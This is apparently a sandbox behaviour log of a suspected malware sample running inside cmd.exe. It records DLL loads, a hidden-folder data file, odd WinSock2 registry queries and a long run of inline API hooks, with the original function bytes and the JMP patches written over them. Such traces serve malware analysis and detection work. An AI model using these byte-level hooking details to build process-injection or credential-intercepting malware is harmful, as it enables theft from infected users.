Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 470000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004174590
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 470000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004178539
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2004203984
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 9A0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2004232693
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 9A0000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 2004274294
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2004275983
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2004285940
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2004288294
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2004296844
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2004297542
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2004298941
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2004299663
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2004321190
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9A0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2004343262
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2004360124
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2004383189
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2004489685
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2004490209
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: BD0000 Length: 13F6B0 Allocation Type: null Protection: page read and write success or wait 2004492325
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: BD0000 Length: 13F6B4 Allocation Type: null Protection: page read and write success or wait 2004492428
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2004521411
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2004521679
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2004521887
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2004522091
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2004522294
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004522539
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004522753
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004522966
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004523178
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004523390
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004523600
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004523813
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004524024
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004524236
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004524448
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 13F484 Allocation Type: null Protection: page execute and read and write success or wait 2004524724
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2004525108
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2004525217
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004525330
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004525434
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 CB 7B success or wait 2004525565
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2004525677
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2004525784
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 83 83 success or wait 2004525912
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2004526027
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2004526401
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2004526506
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5000A Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004526617
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004526724
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 CC 7B success or wait 2004526855
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2004526951
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2004527057
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 5 Value: E9 94 27 83 83 success or wait 2004527184
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2004527297
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2004527708
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2004527814
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50014 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004527925
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004528031
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 BC 7B success or wait 2004528162
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2004528257
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2004528364
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 5 Value: E9 CE 79 93 83 success or wait 2004528490
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2004528603
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2004529187
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2004529292
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5001E Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004529422
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004529528
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA CF 3C success or wait 2004529659
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2004529754
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2004529860
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 5 Value: E9 97 45 80 C2 success or wait 2004529986
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2004530100
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2004530628
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2004530733
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50028 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004530861
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004530967
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE D0 3C success or wait 2004531096
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 7F C2 success or wait 2004531472
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2004531995
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004532264
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 D6 3C success or wait 2004532333
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 79 C2 success or wait 2004532710
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2004533155
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004533371
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 D6 3C success or wait 2004533500
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 79 C2 success or wait 2004533827
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2004534654
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004534920
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 CF 3C success or wait 2004535071
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D949088 Length: 5 Value: E9 AD B1 80 C2 success or wait 2004535401
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2004536212
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004536445
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 CF 3C success or wait 2004536575
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94654B Length: 5 Value: E9 2D DD 80 C2 success or wait 2004536904
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2004537626
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004537860
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 D1 3C success or wait 2004537990
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D963381 Length: 5 Value: E9 36 0F 7F C2 success or wait 2004538317
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2004539110
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004539343
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF CF 3C success or wait 2004539472
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 80 C2 success or wait 2004539800
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2004540594
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004540825
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 CF 3C success or wait 2004540954
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 80 C2 success or wait 2004541280
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2004541648
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004541881
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D E6 70 success or wait 2004542009
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2004542700
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004542932
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2004543748
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004543964
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2004545008
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004545200
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2004546440
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004546677
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2004547683
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004547916
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2004548904
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2004549136
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2004550143
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004550375
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2004551301
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004551531
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2004552500
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004552733
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2004553616
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004553835
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2004554807
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004555023
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2004555887
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004556104
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2004557070
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004557302
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2004558282
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004558497
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2004559489
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004559703
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2004560672
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004560902
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 2004561915
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004562131
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004563335
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004564556
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004565739
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004566981
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004568472
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004569695
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004571007
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004572186
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004573388
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004574591
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004575767
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004576844
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004578033
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004579197
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004580394
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004581601
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004582782
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004583987
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004585163
